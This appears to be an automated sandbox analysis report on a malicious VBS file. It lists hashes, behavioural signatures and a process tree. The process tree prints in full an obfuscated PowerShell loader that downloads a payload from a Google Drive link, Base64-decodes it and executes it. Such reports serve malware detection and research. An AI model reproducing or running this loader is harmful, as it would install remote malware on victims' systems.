Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system -
submitted
30-04-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
Resource
win7-20240419-en
Behavioral task
behavioral2
Sample
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
Resource
win10v2004-20240419-en
General
-
Target
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs
-
Size
8KB
-
MD5
a0ea5a34494368d9e1375f1e5990fdaf
-
SHA1
54045ae962c9bdd612a9be947442086fc5bcd44c
-
SHA256
afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da
-
SHA512
fd7510ee1a0de297c9d4fab4ac7df7f6af7b5aa201d38773aef881ecf766af8d9ecdd4a0958edfced900d416e977a099b351272a8e26698850f0263e86d96ebd
-
SSDEEP
192:spKsbUuCUwy2riaB/Y4Bf7f102btBF8uDrq0wVHZsPpsp/dp93KqcMd5JQmJr9Pv:spKsbUuCUwyIiu/xfB0itv84rTm5gsxV
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2148 powershell.exe 5 2148 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 2 drive.google.com 3 drive.google.com -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2148 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2148 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3000 wrote to memory of 2148 3000 WScript.exe 28 PID 3000 wrote to memory of 2148 3000 WScript.exe 28 PID 3000 wrote to memory of 2148 3000 WScript.exe 28 PID 2148 wrote to memory of 2636 2148 powershell.exe 30 PID 2148 wrote to memory of 2636 2148 powershell.exe 30 PID 2148 wrote to memory of 2636 2148 powershell.exe 30
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\afa1c04b2a56bfb07fcedb39fa07e3ddb5a2760bab1d0dfaa6043e9ce9ea48da.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Geleddernes = 1;$Arbejdsdatabasen='Substrin';$Arbejdsdatabasen+='g';Function Inangulate79($Entrechat){$Pakkeliste=$Entrechat.Length-$Geleddernes;For($Pensionsreglerne=5; $Pensionsreglerne -lt $Pakkeliste; $Pensionsreglerne+=(6)){$Sommerlejre+=$Entrechat.$Arbejdsdatabasen.Invoke($Pensionsreglerne, $Geleddernes);}$Sommerlejre;}function Foreprovided($Saddelmagervrkstedet){. ($Saarbarheds) ($Saddelmagervrkstedet);}$Brookless=Inangulate79 ' ybarMSat rorabboz .ordi Saa,l .osalDioceaTorre/ Orde5Benzo. L,ri0P,yto Dyste(BdetaWOptimiHolomnS raydKir.eoTr phwOkto,s ver BaglyNPullbTAffin V tha1.rone0Kniv,.Uder 0 Phot; Srud ForbrWregneiJernbn ,ant6Menne4Delta;Gnu.b BajoxSt.rk6Komma4Reper; Utro SysterSnesevGodtg:Hjemg1Troml2agen,1Spr n.Fence0N.ate)Vej,e Unw,G Bo ke Ha kcNoniskUnpeaoRetro/Ponde2chemo0Tabu 1Fag l0Biang0 Emen1Nonop0Cl.pp1Skide OffenFJuniaiBu lirbetonejannyfDelusoCon,ex P,og/ rig.1Cris.2Siles1Tumul..ucci0 Hand ';$Prosektor=Inangulate79 'UtilfUAnanisMi roeMillirKup.a- ShesASkgekgBrickeSvrvgn Kla t C.mm ';$Skridtmaaleres=Inangulate79 '.rveoh crett ithot Myt pKarets Ko.r:.etor/ Assi/ ParadRegior fag iBurblvEmotiePrigg.KambagKrebioMonzoo Platgcoultl.refieTelet.Ti recForfaoSkjormastra/kravluPse dcUnder?,opoge .kanxTanklpAcredoMiddlrPerist G us=Perfod CocaoShirtwBage.nHyleglSmle oknoc.aZoomedDuckp&Gal,ci,nhumd norm=Copul1SdendcGlimm4Bver,JKaffeFUndev6Misd,w R.pa3Flamm0Mark.tPy.rocB.skamRigleCHet rpAmovaX ofagJ Filmmtr,inO.inlaBOverfj.hikahNoncozS ereGan gnvEcca 8 Ulst9 Unafrga,mawBriss2Venstx datoDTrfsie petatunimb ';$Amianthus=Inangulate79 'Raadi>a.amn ';$Saarbarheds=Inangulate79 'BajerichriseUfdtbxAnt.b ';$Krystalfrekvensen='Burds';Foreprovided (Inangulate79 ' StirSSoloeeDa.hntLeuco-RimpiC EkstoMelodn Adalt di,seBlegvn SkrmtIrrec Finla-behanPDeputaCaladtFiredh nro KanawTSeko : Tale\GrockK EyesoTematnDi tak .npeu Ps.ur Ve,sr Fo,seLejrsnFanfoc ,enneHippis Shi aLingumSu.dhf .lmiutikmpnSagfrdS.riaeGoodwnPyxeseKolonsFr sn.ChemotWarmnx InsetTagvi endw-Flyv,V IrreaCentrlUdbliuToothe Grei nontr$PrdisKUltrarPri,tyS agts Ba nt Su,ea ksemlCar if Favor ch.leSupinkMelanven ereSammenHovedsCosmee,acspnNelso; Skro ');Foreprovided (Inangulate79 'F.rreiBlgetf Fami E,str(Gl.ttt K,zaeFravasLuccatLeat,-zuniap,ranuaChapotTrifoh Krn FilhTPhola:Stads\Co peKWrabboLrebrnM,juskMozamuBetaerOrdinrPr.sseBoraznKaldecAnmeleT,angsMimera CathmMullafSvmmeuSem,nn ErfadKalkpe enmanHeksee Ov rsRes e. Pedet Tur.xConc,t R,pe) Aphi{sweete Pyl,x binsioutfetAldol}Lands;Gerr ');$judaica = Inangulate79 ' AnedeFlagac Re.ohDatacoHidr oxyd %BarbeaNinnipD terpStvekdOktaeaNotostPo.tnaSeatm% pslu\Ud.oeSPiarot Ora.iKinespEksprpWe.ldl Ba.te Domed Lnov1Forva0Armar7Mimic.BekliuSkyggn .none Jord Krepn&Orbic&Gulvm ataxoePeriecSlughh Stero Gas Angaa$Diabe ';Foreprovided (Inangulate79 'Sk kl$sharpg Besml TppeoL.dssbDisk,aBlitzlSpiri:KlappFNegleaTordelcaprilPhysioStenzs brnde ismarM.ress Mrke1glass6Porte9Rogat=Riob (AnthocNonb.mSpecidMenin Banne/Tinsoc onul Milie$Trindjcivilu ummad UnsoaMilieiRukanc .ineaKonst)Garne ');Foreprovided (Inangulate79 'Skudd$ lbegCemenlOveruoBil,obMoralaSonorlRejoi:DiskeEpartiuStavrbWapsda SoutcA,rodtFrikeeR giorki hoiTeazeuHu rmm stra=Dkke.$PewinSFlarykD,ssorDanewikkkendR,ichtDiagnmTsninaKejs,a.nosclAfk ve,irglrKlargeBegynsDe,ig. Babys.ilhapUnderlCu.tii PhiatUnde (Travh$Phen,ASmud mCom,liV lutaE,ghtnPluknt FredhVaginu alkus,reel)Dimpl ');$Skridtmaaleres=$Eubacterium[0];Foreprovided (Inangulate79 'Venek$Generg SyntlP.oduoS.raybHusm,a.rokllHvlej:sammeOTr,sovVisuaeCata,rNone.iHane,sQuinieDublx1Le.es0 Prer6Ne ha= H.nsN Earie B,omwTrakt-PairpORivinbPhialjFremmebr.kic OvertPour, nonpaSCaloryIn,ogsVaa et Sp neOvenpmGonoc.PleisN.jlfoeAutovtFemka.U sttWDepeneundstbVgtklC JustlFl,keiPetraeLutten,nstatMetha ');Foreprovided (Inangulate79 'Lysaa$ BiorOMuzakv Un.oePrivar CentiNotatsUdsoneSitop1Slavo0 Syer6,reco.martyH Dy.meBa.eaaUnarcdFreg,eCivilrSignasRevol[,lves$sladrP Udb,rIndenoPsychs Tw,neexpirkUns,atBa lvo OverrSpise]Norma= kend$DanskBAlbinrTotaloangstoDedikkTotr,lPig,teNon.ysFamilsQ.esa ');$Sew=Inangulate79 '.yrenOPropovsaliceLsketrMusiciRh,mnsVrtsle err1Kuppe0Anfre6Udha .ParkiDProgroMad owScrolnSocialGladdoSaddea Inged MuroF sub,iMercalOrr.peInane(Conte$ReheaSSrb skSludfrBeraaiPer.pdFrafatCacogmPoi taOmostaUdplal retreJournrDenedeStdpus Stou,K,rak$PerfoP ShoohTabelo UnmerChafeoCavalmSp.oge ProctMot rr Pibeyforsp)s,otg ';$Sew=$Fallosers169[1]+$Sew;$Phorometry=$Fallosers169[0];Foreprovided (Inangulate79 'Ensre$formagSkottl.oinmo TaffbPamflaidnerlInflu:LagenbbyzonoOve,fvHodadiAfgannprivaiTrametYeggsiidrt,eReg osForst= ,las(KnottT Vadeesti.esCinchtLandb-Gr.seP TastaBilagtSynk,h.rest Jordl$ UndeP PlanhMagneo ,litr L,cho estam redde AlvetSidstrDicyey Atta)Be lu ');while (!$bovinities) {Foreprovided (Inangulate79 'Mo,by$Jenkog aretlStorkoSlgtsbholliaCharaltr pe: ErhvMDempnoEksplrUds,urNonrahTran u.aratiDiscon unta= .ang$ an.ltLegemrGeniau Systede ut ') ;Foreprovided $Sew;Foreprovided (Inangulate79 'Saml.SAabnit,ereoaC,nstr Toggtmis,r-.abriSV.llulKlicheFristeI,aqip Nege unim4 Town ');Foreprovided (Inangulate79 'Slugg$umenngtypeblout,hoIndsibPrcisaSystel nmak:guldebM.todoTo.mavL,tiniMundsnflintikloaktReligi He.leH tersZebue=,ight( StabTAmmoneHu drslavistS.ran-Be krPCirkuaRig.ut Tak h,kste Kolpo$SuberPVelathPamfloBiogerL.geboAgricmNatureAftaltHaulerRespoyAkkum)G.ads ') ;Foreprovided (Inangulate79 ' slid$Abst.gAutoflGladiodiaclb obliaAntirl ronk:SprutCG.insagutterRootln Equii Aaref FrysiToolseProvod Genn1Stabe9 Uund3 Hule=Iyars$Re,stgFeelilSpildoMask bTurnpaLog.elBill,:Lay,uSBrus.l MiskyMindenI ritgNonv,nGugleiBarr.nestaegTrunceScenorErysinEmbede ,jansDataf+Exfig+Slagv%Stddm$J,tbrEFunktuMe asbTekniaJunnicYanintPre,leBrin rInexpi Dobbu Ove mFonom.CulotcRredfo Unduu,aston CametKl.ch ') ;$Skridtmaaleres=$Eubacterium[$Carnified193];}Foreprovided (Inangulate79 'Histo$blankgUngsklJagtro.kolebTopotaBeslulK.nku:BlaffPOverroAfr,asPaatvtSkyllv DisksD.coynExtroeT.oppr Aco Skri=Feebl SkurkGsoundeSkilrtlyric-GeomoCAng loSupernDimplt AkvaeHardenUni,vtB.nda Kash$F.ambPSe arh.yskoo neutrAllisoYark,mGtevieKildetmoderrV entyVmmel ');Foreprovided (Inangulate79 ' Opr $EvanggUnhoilArango .atrbUdboraDac,slHea.e: saliGHa edoChalcl GraagCer.uo Hnget confh .iruaSeng, Pall=Grano Nyczi[Torp SForsky.attesAlephtDommeeMast,mL.ere.IndolCSte.ioproexnBrnevv IndueKurisrDechitBesae] U me: Bris:IliasFKlo srImmi,oBub.em ap.eB PantaNonassdepileEro.i6Squas4Posi SAcrotttransr previ.entrnGn,isg nacc(Stabl$InterPBloodoOmfatsPill,tBjld.v I,cis Aul.nL,onseGunshrSenat)Brygg ');Foreprovided (Inangulate79 'Opslu$TrykkgRoughlTilgoo ranibCowpea helolkodev:SpidsFUnderi,atursHyl,ekBriefeOfferrFejltiKronefMonseoSkyldrdowngefoedtnther.iPaladnirreggFagu sUnloo Squin= Peri No fr[OverpS K.ttyPhalasSkibstS ruteMidermstre,.Bra iTLenete DdbixDorsetStan.. Ac,oEBiomenSi,elcZaphroAlcaydMu,hmi SpecnDiaphgTankb]Hagge:Manip:Klum AOverbSCh.moCFor aIPomacINoume.acemiGankuse,megmt Lat S.ndertKynikr s.ppiGear,ndynamgBr.kk(Het r$OutgaGSvejsoBethrlF,erbgU tado AdretUnthehUnneeaAhnfe) f,gk ');Foreprovided (Inangulate79 ' Anke$Col,ngLavrylJasteo MellbFrosca ndelPosta:,aiwaORetsvvFuldte AnnorImparbAnmela relir ManorIoanneWilkin ermwn oghaeCac ds ndss Hern=Disse$T lsmF MuriiAfbl,s VagtkDeli.ePyxidr ouldiTraumfRaglaoUn,errMa.cee Fa.dnT.btyianal nPaestgAspresUdv,k.PlatysEstruuRemoobBinyrsDisd.tBeraprI turiMarmonEks ogLiefl(Repti3 Sulf2T,pht1 Vitu2Han.a6 onde9centr,Klutz2Excul8Eksek7Strep7.tepg0Pan u)Kenss ');Foreprovided $Overbarrenness;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Stippled107.une && echo $"3⤵PID:2636
-
-